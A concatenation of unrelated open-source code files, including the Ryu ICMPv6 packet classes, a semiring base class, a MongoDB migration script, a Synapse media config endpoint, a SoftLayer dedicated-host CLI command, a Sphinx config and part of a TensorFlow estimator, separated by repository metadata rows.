    __init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
type\_ Type
code Code
csum CheckSum
(0 means automatically-calculate when encoding)
data Payload.
ryu.lib.packet.icmpv6.echo object, or \
ryu.lib.packet.icmpv6.nd_neighbor object, or a bytearray.
============== ====================
"""
_PACK_STR = '!BBH'
_MIN_LEN = struct.calcsize(_PACK_STR)
_ICMPV6_TYPES = {}
@staticmethod
def register_icmpv6_type(*args):
def _register_icmpv6_type(cls):
for type_ in args:
icmpv6._ICMPV6_TYPES[type_] = cls
return cls
return _register_icmpv6_type
def __init__(self, type_, code, csum, data=None):
super(icmpv6, self).__init__()
self.type_ = type_
self.code = code
self.csum = csum
self.data = data
@classmethod
def parser(cls, buf):
(type_, code, csum) = struct.unpack_from(cls._PACK_STR, buf)
msg = cls(type_, code, csum)
offset = cls._MIN_LEN
if len(buf) > offset:
cls_ = cls._ICMPV6_TYPES.get(type_, None)
if cls_:
msg.data = cls_.parser(buf, offset)
else:
msg.data = buf[offset:]
return msg, None, None
def serialize(self, payload, prev):
hdr = bytearray(struct.pack(icmpv6._PACK_STR, self.type_,
self.code, self.csum))
if self.data is not None:
if self.type_ in icmpv6._ICMPV6_TYPES:
hdr += self.data.serialize()
else:
hdr += self.data
if self.csum == 0:
self.csum = packet_utils.checksum_ip(prev, len(hdr), hdr + payload)
struct.pack_into('!H', hdr, 2, self.csum)
return hdr
@icmpv6.register_icmpv6_type(ND_NEIGHBOR_SOLICIT, ND_NEIGHBOR_ADVERT)
class nd_neighbor(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Neighbor Solicitation and
Neighbor Advertisement messages. (RFC 4861)
This is used with ryu.lib.packet.icmpv6.icmpv6.
An instance has the following attributes at least.
    Most of them are the same as the on-wire counterparts, but in host byte order.
    __init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
res R,S,O Flags for Neighbor Advertisement. \
The 3 MSBs of "Reserved" field for Neighbor Solicitation.
dst Target Address
type\_ "Type" field of the first option. None if no options. \
NOTE: This implementation doesn't support two or more \
options.
length "Length" field of the first option. None if no options.
data An object to describe the first option. \
None if no options. \
Either ryu.lib.packet.icmpv6.nd_option_la object \
or a bytearray.
============== ====================
"""
_PACK_STR = '!I16s'
_MIN_LEN = struct.calcsize(_PACK_STR)
_ND_OPTION_TYPES = {}
# ND option type
ND_OPTION_SLA = 1 # Source Link-Layer Address
ND_OPTION_TLA = 2 # Target Link-Layer Address
ND_OPTION_PI = 3 # Prefix Information
ND_OPTION_RH = 4 # Redirected Header
ND_OPTION_MTU = 5 # MTU
@staticmethod
def register_nd_option_type(*args):
def _register_nd_option_type(cls):
for type_ in args:
nd_neighbor._ND_OPTION_TYPES[type_] = cls
return cls
return _register_nd_option_type
def __init__(self, res, dst, type_=None, length=None, data=None):
self.res = res << 29
self.dst = dst
self.type_ = type_
self.length = length
self.data = data
@classmethod
def parser(cls, buf, offset):
(res, dst) = struct.unpack_from(cls._PACK_STR, buf, offset)
msg = cls(res >> 29, addrconv.ipv6.bin_to_text(dst))
offset += cls._MIN_LEN
if len(buf) > offset:
(msg.type_, msg.length) = struct.unpack_from('!BB', buf, offset)
cls_ = cls._ND_OPTION_TYPES.get(msg.type_, None)
offset += 2
if cls_:
msg.data = cls_.parser(buf, offset)
else:
msg.data = buf[offset:]
return msg
def serialize(self):
hdr = bytearray(struct.pack(nd_neighbor._PACK_STR, self.res,
addrconv.ipv6.text_to_bin(self.dst)))
if self.type_ is not None:
hdr += bytearray(struct.pack('!BB', self.type_, self.length))
if self.type_ in nd_neighbor._ND_OPTION_TYPES:
hdr += self.data.serialize()
elif self.data is not None:
hdr += bytearray(self.data)
return hdr
@icmpv6.register_icmpv6_type(ND_ROUTER_SOLICIT)
class nd_router_solicit(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Router Solicitation messages.
(RFC 4861)
This is used with ryu.lib.packet.icmpv6.icmpv6.
An instance has the following attributes at least.
    Most of them are the same as the on-wire counterparts, but in host byte order.
    __init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
res This field is unused. It MUST be initialized to zero.
type\_ "Type" field of the first option. None if no options. \
NOTE: This implementation doesn't support two or more \
options.
length "Length" field of the first option. None if no options.
data An object to describe the first option. \
None if no options. \
Either ryu.lib.packet.icmpv6.nd_option_la object \
or a bytearray.
============== ====================
"""
_PACK_STR = '!I'
_MIN_LEN = struct.calcsize(_PACK_STR)
_ND_OPTION_TYPES = {}
# ND option type
ND_OPTION_SLA = 1 # Source Link-Layer Address
@staticmethod
def register_nd_option_type(*args):
def _register_nd_option_type(cls):
for type_ in args:
nd_router_solicit._ND_OPTION_TYPES[type_] = cls
return cls
return _register_nd_option_type
def __init__(self, res, type_=None, length=None, data=None):
self.res = res
self.type_ = type_
self.length = length
self.data = data
@classmethod
def parser(cls, buf, offset):
res = struct.unpack_from(cls._PACK_STR, buf, offset)
msg = cls(res)
offset += cls._MIN_LEN
if len(buf) > offset:
(msg.type_, msg.length) = struct.unpack_from('!BB', buf, offset)
cls_ = cls._ND_OPTION_TYPES.get(msg.type_, None)
offset += 2
if cls_:
msg.data = cls_.parser(buf, offset)
else:
msg.data = buf[offset:]
return msg
def serialize(self):
hdr = bytearray(struct.pack(nd_router_solicit._PACK_STR, self.res))
if self.type_ is not None:
hdr += bytearray(struct.pack('!BB', self.type_, self.length))
if self.type_ in nd_router_solicit._ND_OPTION_TYPES:
hdr += self.data.serialize()
elif self.data is not None:
hdr += bytearray(self.data)
return hdr
@icmpv6.register_icmpv6_type(ND_ROUTER_ADVERT)
class nd_router_advert(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Router Advertisement messages.
(RFC 4861)
This is used with ryu.lib.packet.icmpv6.icmpv6.
An instance has the following attributes at least.
    Most of them are the same as the on-wire counterparts, but in host byte order.
    __init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
ch_l Cur Hop Limit.
res M,O Flags for Router Advertisement.
rou_l Router Lifetime.
rea_t Reachable Time.
ret_t Retrans Timer.
type\_ List of option type. Each index refers to an option. \
None if no options. \
                    NOTE: This implementation supports one or more \
options.
length List of option length. Each index refers to an option. \
None if no options. \
data List of option data. Each index refers to an option. \
None if no options. \
ryu.lib.packet.icmpv6.nd_option_la object, \
ryu.lib.packet.icmpv6.nd_option_pi object \
or a bytearray.
============== ====================
"""
_PACK_STR = '!BBHII'
_MIN_LEN = struct.calcsize(_PACK_STR)
_ND_OPTION_TYPES = {}
# ND option type
ND_OPTION_SLA = 1 # Source Link-Layer Address
ND_OPTION_PI = 3 # Prefix Information
ND_OPTION_MTU = 5 # MTU
@staticmethod
def register_nd_option_type(*args):
def _register_nd_option_type(cls):
for type_ in args:
nd_router_advert._ND_OPTION_TYPES[type_] = cls
return cls
return _register_nd_option_type
def __init__(self, ch_l, res, rou_l, rea_t, ret_t, type_=None, length=None,
data=None):
self.ch_l = ch_l
self.res = res << 6
self.rou_l = rou_l
self.rea_t = rea_t
self.ret_t = ret_t
self.type_ = type_
self.length = length
self.data = data
@classmethod
def parser(cls, buf, offset):
(ch_l, res, rou_l, rea_t, ret_t) = struct.unpack_from(cls._PACK_STR,
buf, offset)
msg = cls(ch_l, res >> 6, rou_l, rea_t, ret_t)
offset += cls._MIN_LEN
msg.type_ = list()
msg.length = list()
msg.data = list()
while len(buf) > offset:
(type_, length) = struct.unpack_from('!BB', buf, offset)
msg.type_.append(type_)
msg.length.append(length)
cls_ = cls._ND_OPTION_TYPES.get(type_, None)
offset += 2
if cls_:
msg.data.append(cls_.parser(buf[:offset+cls_._MIN_LEN],
offset))
offset += cls_._MIN_LEN
else:
msg.data.append(buf[offset:])
offset = len(buf)
return msg
def serialize(self):
hdr = bytearray(struct.pack(nd_router_advert._PACK_STR, self.ch_l,
self.res, self.rou_l, self.rea_t,
self.ret_t))
if self.type_ is not None:
for i in range(len(self.type_)):
hdr += bytearray(struct.pack('!BB', self.type_[i],
self.length[i]))
if self.type_[i] in nd_router_advert._ND_OPTION_TYPES:
hdr += self.data[i].serialize()
elif self.data[i] is not None:
hdr += bytearray(self.data[i])
return hdr
@nd_neighbor.register_nd_option_type(nd_neighbor.ND_OPTION_SLA,
nd_neighbor.ND_OPTION_TLA)
@nd_router_solicit.register_nd_option_type(nd_router_solicit.ND_OPTION_SLA)
@nd_router_advert.register_nd_option_type(nd_router_advert.ND_OPTION_SLA)
class nd_option_la(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Neighbor discovery
Source/Target Link-Layer Address Option. (RFC 4861)
This is used with ryu.lib.packet.icmpv6.nd_neighbor,
ryu.lib.packet.icmpv6.nd_router_solicit or
ryu.lib.packet.icmpv6.nd_router_advert.
An instance has the following attributes at least.
    Most of them are the same as the on-wire counterparts, but in host byte order.
    __init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
hw_src Link-Layer Address. \
NOTE: If the address is longer than 6 octets this contains \
the first 6 octets in the address. \
This implementation assumes the address has at least \
6 octets.
data A bytearray which contains the rest of Link-Layer Address \
                   and padding. When encoding a packet, it's the user's \
responsibility to provide necessary padding for 8-octets \
alignment required by the protocol.
============== ====================
"""
_PACK_STR = '!6s'
_MIN_LEN = struct.calcsize(_PACK_STR)
def __init__(self, hw_src, data=None):
self.hw_src = hw_src
self.data = data
@classmethod
def parser(cls, buf, offset):
(hw_src, ) = struct.unpack_from(cls._PACK_STR, buf, offset)
msg = cls(addrconv.mac.bin_to_text(hw_src))
offset += cls._MIN_LEN
if len(buf) > offset:
msg.data = buf[offset:]
return msg
def serialize(self):
hdr = bytearray(struct.pack(self._PACK_STR,
addrconv.mac.text_to_bin(self.hw_src)))
if self.data is not None:
hdr += bytearray(self.data)
return hdr
@nd_router_advert.register_nd_option_type(nd_router_advert.ND_OPTION_PI)
class nd_option_pi(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Neighbor discovery
Prefix Information Option. (RFC 4861)
This is used with ryu.lib.packet.icmpv6.nd_router_advert.
An instance has the following attributes at least.
    Most of them are the same as the on-wire counterparts, but in host byte order.
    __init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
pl Prefix Length.
res1 L,A,R\* Flags for Prefix Information.
val_l Valid Lifetime.
pre_l Preferred Lifetime.
res2 This field is unused. It MUST be initialized to zero.
prefix An IP address or a prefix of an IP address.
============== ====================
\*R flag is defined in (RFC 3775)
"""
_PACK_STR = '!BBIII16s'
_MIN_LEN = struct.calcsize(_PACK_STR)
def __init__(self, pl, res1, val_l, pre_l, res2, prefix):
self.pl = pl
self.res1 = res1 << 5
self.val_l = val_l
self.pre_l = pre_l
self.res2 = res2
self.prefix = prefix
@classmethod
def parser(cls, buf, offset):
(pl, res1, val_l, pre_l, res2, prefix) = struct.unpack_from(cls.
_PACK_STR,
buf,
offset)
msg = cls(pl, res1 >> 5, val_l, pre_l, res2,
addrconv.ipv6.bin_to_text(prefix))
return msg
def serialize(self):
hdr = bytearray(struct.pack(self._PACK_STR, self.pl, self.res1,
self.val_l, self.pre_l, self.res2,
addrconv.ipv6.text_to_bin(self.prefix)))
return hdr
@icmpv6.register_icmpv6_type(ICMPV6_ECHO_REPLY, ICMPV6_ECHO_REQUEST)
class echo(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Echo Request and Echo Reply
messages.
This is used with ryu.lib.packet.icmpv6.icmpv6 for
ICMPv6 Echo Request and Echo Reply messages.
An instance has the following attributes at least.
    Most of them are the same as the on-wire counterparts, but in host byte order.
    __init__ takes the corresponding args in this order.
============== ====================
Attribute Description
============== ====================
id Identifier
seq Sequence Number
data Data
============== ====================
"""
_PACK_STR = '!HH'
_MIN_LEN = struct.calcsize(_PACK_STR)
def __init__(self, id_, seq, data=None):
self.id = id_
self.seq = seq
self.data = data
@classmethod
def parser(cls, buf, offset):
(id_, seq) = struct.unpack_from(cls._PACK_STR, buf, offset)
msg = cls(id_, seq)
offset += cls._MIN_LEN
if len(buf) > offset:
msg.data = buf[offset:]
return msg
def serialize(self):
hdr = bytearray(struct.pack(echo._PACK_STR, self.id,
self.seq))
if self.data is not None:
hdr += bytearray(self.data)
return hdr
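# A minimal usage sketch (added for illustration, not part of the original
# module): building an ICMPv6 Echo Request and round-tripping it through
# serialize()/parser(). In real code the enclosing ryu ipv6/packet objects
# drive serialize() and compute the checksum; here a non-zero placeholder
# csum is used so no pseudo-header (`prev`) is needed.
def _echo_request_example():
    ping = icmpv6(type_=ICMPV6_ECHO_REQUEST, code=0, csum=0xffff,
                  data=echo(id_=0x1234, seq=1, data=b'ping'))
    wire = ping.serialize(payload=bytearray(), prev=None)
    parsed, _, _ = icmpv6.parser(bytes(wire))
    return parsed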
| apache-2.0 | -3,966,669,144,491,497,000 | 34.08363 | 79 | 0.549171 | false | 3.829287 | false | false | false |
sdynerow/Semirings-Library | python/Metarouting/Algebra/Semiring.py | 2 | 2021 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012 - Seweryn Dynerowicz, FUNDP.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class Semiring:
zeroElt = None
unitElt = None
def __init__(self, val):
self.elt = val
def __add__(self, other):
raise NotImplementedError("Additive law not implemented.")
def __mul__(self, other):
raise NotImplementedError("Multiplicative law not implemented.")
def __le__(self, other): # <=
raise NotImplementedError("Canonical preorder relation not specified.")
def __lt__(self, other): # <
return (self <= other and self != other)
def __ge__(self, other):
return (other <= self)
def __gt__(self, other):
return (other < self)
def __eq__(self, other):
return (self.elt == other.elt)
def __ne__(self, other):
return (not self.elt == other.elt)
# Representation related stuff
def __repr__(self):
raise NotImplementedError("Representation not specified.")
# Power operator (not square-and-multiply)
def __pow__(self, p):
rPow = p
res = self.unit()
while(rPow > 0):
res = res * self
rPow -= 1
return res
def isZero(self):
return self.elt == self.zeroElt
def isUnit(self):
return self.elt == self.unitElt
@classmethod
def zero(cls):
return cls(cls.zeroElt)
@classmethod
def unit(cls):
return cls(cls.unitElt)
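# A minimal illustrative subclass (an assumption for demonstration, not part
# of the library): the min-plus "shortest path" semiring, where addition is
# min, multiplication is ordinary +, zero is +infinity and unit is 0.
class MinPlus(Semiring):
    zeroElt = float('inf')
    unitElt = 0
    def __add__(self, other):
        return MinPlus(min(self.elt, other.elt))
    def __mul__(self, other):
        return MinPlus(self.elt + other.elt)
    def __le__(self, other):
        # canonical preorder: a <= b iff a + b == a (min selects a)
        return (self + other) == self
    def __repr__(self):
        return "MinPlus(%s)" % self.elt
# e.g. MinPlus(3) + MinPlus(5) == MinPlus(3) and MinPlus(3) * MinPlus(5) == MinPlus(8)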
| apache-2.0 | -7,328,780,655,527,917,000 | 26.310811 | 87 | 0.619 | false | 3.924272 | false | false | false |
matrix-org/synapse | synapse/rest/media/v1/config_resource.py | 1 | 1540 | # Copyright 2018 Will Hunt <[email protected]>
# Copyright 2020-2021 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import TYPE_CHECKING
from twisted.web.server import Request
from synapse.http.server import DirectServeJsonResource, respond_with_json
from synapse.http.site import SynapseRequest
if TYPE_CHECKING:
from synapse.server import HomeServer
class MediaConfigResource(DirectServeJsonResource):
isLeaf = True
def __init__(self, hs: "HomeServer"):
super().__init__()
config = hs.config
self.clock = hs.get_clock()
self.auth = hs.get_auth()
self.limits_dict = {"m.upload.size": config.max_upload_size}
async def _async_render_GET(self, request: SynapseRequest) -> None:
await self.auth.get_user_by_req(request)
respond_with_json(request, 200, self.limits_dict, send_cors=True)
async def _async_render_OPTIONS(self, request: Request) -> None:
respond_with_json(request, 200, {}, send_cors=True)
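# For reference (hedged: the exact mount point is configured elsewhere in the
# media repository), a GET to this resource returns a small JSON body such as
#   {"m.upload.size": 52428800}
# i.e. the homeserver's configured max_upload_size in bytes.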
| apache-2.0 | 5,197,898,967,068,174,000 | 34.813953 | 74 | 0.718831 | false | 3.684211 | false | false | false |
shaneneuerburg/cgrates | data/scripts/migrator/dbsmerge_mongo.py | 3 | 3374 | #!/usr/bin/python
# depends:
# ^ pymongo # install via: easy_install pymongo
# behaviour:
# ^ the script will "move" the collections if source and target server are the same
# but will "copy" (dump/restore) if source and target servers are different
from_host = '127.0.0.1'
from_port = '27017'
from_db = '11'
from_auth_db = 'cgrates' # Auth db on source server
from_user = 'cgrates'
from_pass = ''
to_host = '127.0.0.1'
to_port = '27017'
to_db = '10'
to_auth_db = "cgrates" # Auth db on target server
to_user = 'cgrates'
to_pass = ''
# Do not migrate collections with 0 document count.
# Works only if from/to is on same host.
ignore_empty_cols = True
# Overwrite target collections flag.
# Works only if from/to is on same host.
# If from/to hosts are different we use mongorestore which overwrites by default.
drop_target = False
dump_folder = 'dump'
import sys
from pymongo import MongoClient
from urllib import quote_plus
from collections import OrderedDict
# same server
if from_host == to_host and from_port == to_port:
print('Migrating on same server...')
mongo_from_url = 'mongodb://' + from_user + ':' + quote_plus(from_pass) + '@'+ from_host + ':' + from_port + '/' + from_auth_db
if from_pass == '': # disabled auth
mongo_from_url = 'mongodb://' + from_host + ':' + from_port + '/' + from_db
client = MongoClient(mongo_from_url)
db = client[from_db]
cols = db.collection_names()
# collections found
if len(cols) > 0:
print('Found %d collections on source. Moving...' % len(cols))
i = 0
for col in cols:
i += 1
if not ignore_empty_cols or (ignore_empty_cols and db[col].count() > 0):
print('Moving collection %s (%d of %d)...' % (col, i, len(cols)))
try:
client.admin.command(OrderedDict([('renameCollection', from_db + '.' + col), ('to', to_db + '.' + col), ('dropTarget', drop_target)]))
except:
e = sys.exc_info()[0]
print(e)
else:
print('Skipping empty collection %s (%d of %d)...' % (col, i, len(cols)))
# no collections found
else:
print('No collections in source database.')
# different servers
else:
import subprocess
import os
import shutil
print('Migrating between different servers...')
print('Dumping...')
out = subprocess.check_output([
'mongodump',
'--host', '%s' % from_host,
'-u', '%s' % from_user,
'-p', '%s' % from_pass,
'--authenticationDatabase', '%s' % from_auth_db,
'--db', '%s' % from_db,
'--port', '%s' % from_port,
'-o', '%s' % dump_folder,
], stderr= subprocess.STDOUT)
print('Dump complete.')
print('Restoring...')
out = subprocess.check_output([
'mongorestore',
'--host', '%s' % to_host,
'-u', '%s' % to_user,
'-p', '%s' % to_pass,
'--authenticationDatabase', '%s' % to_auth_db,
'--db', '%s' % to_db,
'--port', '%s' % to_port,
'--drop', '%s/%s' % (dump_folder, from_db),
], stderr= subprocess.STDOUT)
print('Restore complete.')
print('Migration complete.')
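# For reference (assumed equivalence, not part of the original script): the
# same-server branch above is the scripted form of the mongo shell command
#   db.adminCommand({renameCollection: "<from_db>.<col>", to: "<to_db>.<col>", dropTarget: false})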
| gpl-3.0 | 1,611,922,954,929,420,300 | 32.405941 | 158 | 0.54594 | false | 3.525601 | false | false | false |
kyubifire/softlayer-python | SoftLayer/CLI/dedicatedhost/create.py | 4 | 3969 | """Order/create a dedicated Host."""
# :license: MIT, see LICENSE for more details.
import click
import SoftLayer
from SoftLayer.CLI import environment
from SoftLayer.CLI import exceptions
from SoftLayer.CLI import formatting
from SoftLayer.CLI import template
@click.command(
epilog="See 'slcli dedicatedhost create-options' for valid options.")
@click.option('--hostname', '-H',
help="Host portion of the FQDN",
required=True,
prompt=True)
@click.option('--router', '-r',
help="Router hostname ex. fcr02a.dal13",
show_default=True)
@click.option('--domain', '-D',
help="Domain portion of the FQDN",
required=True,
prompt=True)
@click.option('--datacenter', '-d', help="Datacenter shortname",
required=True,
prompt=True)
@click.option('--flavor', '-f', help="Dedicated Virtual Host flavor",
required=True,
prompt=True)
@click.option('--billing',
type=click.Choice(['hourly', 'monthly']),
default='hourly',
show_default=True,
help="Billing rate")
@click.option('--verify',
is_flag=True,
help="Verify dedicatedhost without creating it.")
@click.option('--template', '-t',
is_eager=True,
callback=template.TemplateCallback(list_args=['key']),
help="A template file that defaults the command-line options",
type=click.Path(exists=True, readable=True, resolve_path=True))
@click.option('--export',
type=click.Path(writable=True, resolve_path=True),
help="Exports options to a template file")
@environment.pass_env
def cli(env, **kwargs):
"""Order/create a dedicated host."""
mgr = SoftLayer.DedicatedHostManager(env.client)
order = {
'hostname': kwargs['hostname'],
'domain': kwargs['domain'],
'flavor': kwargs['flavor'],
'location': kwargs['datacenter'],
'hourly': kwargs.get('billing') == 'hourly',
}
if kwargs['router']:
order['router'] = kwargs['router']
do_create = not (kwargs['export'] or kwargs['verify'])
output = None
result = mgr.verify_order(**order)
table = formatting.Table(['Item', 'cost'])
table.align['Item'] = 'r'
table.align['cost'] = 'r'
if len(result['prices']) != 1:
raise exceptions.ArgumentError("More than 1 price was found or no "
"prices found")
price = result['prices']
if order['hourly']:
total = float(price[0].get('hourlyRecurringFee', 0.0))
else:
total = float(price[0].get('recurringFee', 0.0))
if order['hourly']:
table.add_row(['Total hourly cost', "%.2f" % total])
else:
table.add_row(['Total monthly cost', "%.2f" % total])
output = []
output.append(table)
output.append(formatting.FormattedItem(
'',
' -- ! Prices reflected here are retail and do not '
'take account level discounts and are not guaranteed.'))
if kwargs['export']:
export_file = kwargs.pop('export')
template.export_to_template(export_file, kwargs,
exclude=['wait', 'verify'])
env.fout('Successfully exported options to a template file.')
if do_create:
if not env.skip_confirmations and not formatting.confirm(
"This action will incur charges on your account. "
"Continue?"):
raise exceptions.CLIAbort('Aborting dedicated host order.')
result = mgr.place_order(**order)
table = formatting.KeyValueTable(['name', 'value'])
table.align['name'] = 'r'
table.align['value'] = 'l'
table.add_row(['id', result['orderId']])
table.add_row(['created', result['orderDate']])
output.append(table)
env.fout(output)
| mit | -9,193,515,461,802,948,000 | 33.815789 | 77 | 0.580499 | false | 4.112953 | false | false | false |
rgreinho/docker-django-cookiecutter | {{ cookiecutter.project_name }}/docs/source/conf.py | 1 | 2818 | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.coverage', 'sphinx.ext.viewcode', ]
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'{{ cookiecutter.project_name }}'
copyright = u'{{ cookiecutter.year }}, {{ cookiecutter.author }}'
version = u'{{ cookiecutter.version }}'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [('index', '%s.tex' % project, u'%s Documentation' % project, u'OpenStack Foundation', 'manual'), ]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
| mit | -603,125,598,092,764,400 | 38.690141 | 117 | 0.702626 | false | 3.818428 | false | false | false |
mrry/tensorflow | tensorflow/contrib/learn/python/learn/estimators/dnn_linear_combined.py | 3 | 29937 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow estimators for Linear and DNN joined training models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib import layers
from tensorflow.contrib.framework import deprecated
from tensorflow.contrib.framework import deprecated_arg_values
from tensorflow.contrib.framework.python.ops import variables as contrib_variables
from tensorflow.contrib.layers.python.layers import feature_column_ops
from tensorflow.contrib.learn.python.learn.estimators import composable_model
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import training
def _changing_default_center_bias():
logging.warn(
"Change warning: default value of `enable_centered_bias` will change"
" after 2016-10-09. It will be disabled by default."
"Instructions for keeping existing behaviour:\n"
"Explicitly set `enable_centered_bias` to 'True' if you want to keep "
"existing behaviour.")
# TODO(ispir): Increase test coverage
class _DNNLinearCombinedBaseEstimator(estimator.BaseEstimator):
"""An estimator for TensorFlow Linear and DNN joined training models.
Input of `fit`, `train`, and `evaluate` should have following features,
otherwise there will be a `KeyError`:
if `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
for each `column` in `dnn_feature_columns` + `linear_feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `WeightedSparseColumn`, two features: the first with
`key` the id column name, the second with `key` the weight column
name. Both features' `value` must be a `SparseTensor`.
- if `column` is a `RealValuedColumn, a feature with `key=column.name`
whose `value` is a `Tensor`.
"""
def __init__(self, # _joint_linear_weights pylint: disable=invalid-name
target_column,
model_dir=None,
linear_feature_columns=None,
linear_optimizer=None,
_joint_linear_weights=False,
dnn_feature_columns=None,
dnn_optimizer=None,
dnn_hidden_units=None,
dnn_activation_fn=nn.relu,
dnn_dropout=None,
gradient_clip_norm=None,
enable_centered_bias=True,
config=None,
feature_engineering_fn=None):
"""Initializes a _DNNLinearCombinedBaseEstimator instance.
Args:
target_column: A _TargetColumn object.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator
to continue training a previously saved model.
linear_feature_columns: An iterable containing all the feature columns
used by linear part of the model. All items in the set should be
instances of classes derived from `FeatureColumn`.
linear_optimizer: An instance of `tf.Optimizer` used to apply gradients to
the linear part of the model. If `None`, will use a FTRL optimizer.
_joint_linear_weights: If True will use a single (possibly partitioned)
variable to store all weights for the linear model. More efficient if
there are many columns, however requires all columns are sparse and
have the 'sum' combiner.
dnn_feature_columns: An iterable containing all the feature columns used
by deep part of the model. All items in the set should be instances of
classes derived from `FeatureColumn`.
dnn_optimizer: An instance of `tf.Optimizer` used to apply gradients to
the deep part of the model. If `None`, will use an Adagrad optimizer.
dnn_hidden_units: List of hidden units per layer. All layers are fully
connected.
dnn_activation_fn: Activation function applied to each layer. If `None`,
will use `tf.nn.relu`.
dnn_dropout: When not None, the probability we will drop out
a given coordinate.
gradient_clip_norm: A float > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
tf.clip_by_global_norm for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
config: RunConfig object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
targets which are the output of `input_fn` and
returns features and targets which will be fed
into the model.
Raises:
ValueError: If both linear_feature_columns and dnn_features_columns are
empty at the same time.
"""
super(_DNNLinearCombinedBaseEstimator, self).__init__(
model_dir=model_dir, config=config)
num_ps_replicas = config.num_ps_replicas if config else 0
self._linear_model = composable_model.LinearComposableModel(
num_label_columns=target_column.num_label_columns,
optimizer=linear_optimizer,
_joint_weights=_joint_linear_weights,
gradient_clip_norm=gradient_clip_norm,
num_ps_replicas=num_ps_replicas)
self._dnn_model = composable_model.DNNComposableModel(
num_label_columns=target_column.num_label_columns,
hidden_units=dnn_hidden_units,
optimizer=dnn_optimizer,
activation_fn=dnn_activation_fn,
dropout=dnn_dropout,
gradient_clip_norm=gradient_clip_norm,
num_ps_replicas=num_ps_replicas) if dnn_hidden_units else None
self._linear_feature_columns = linear_feature_columns
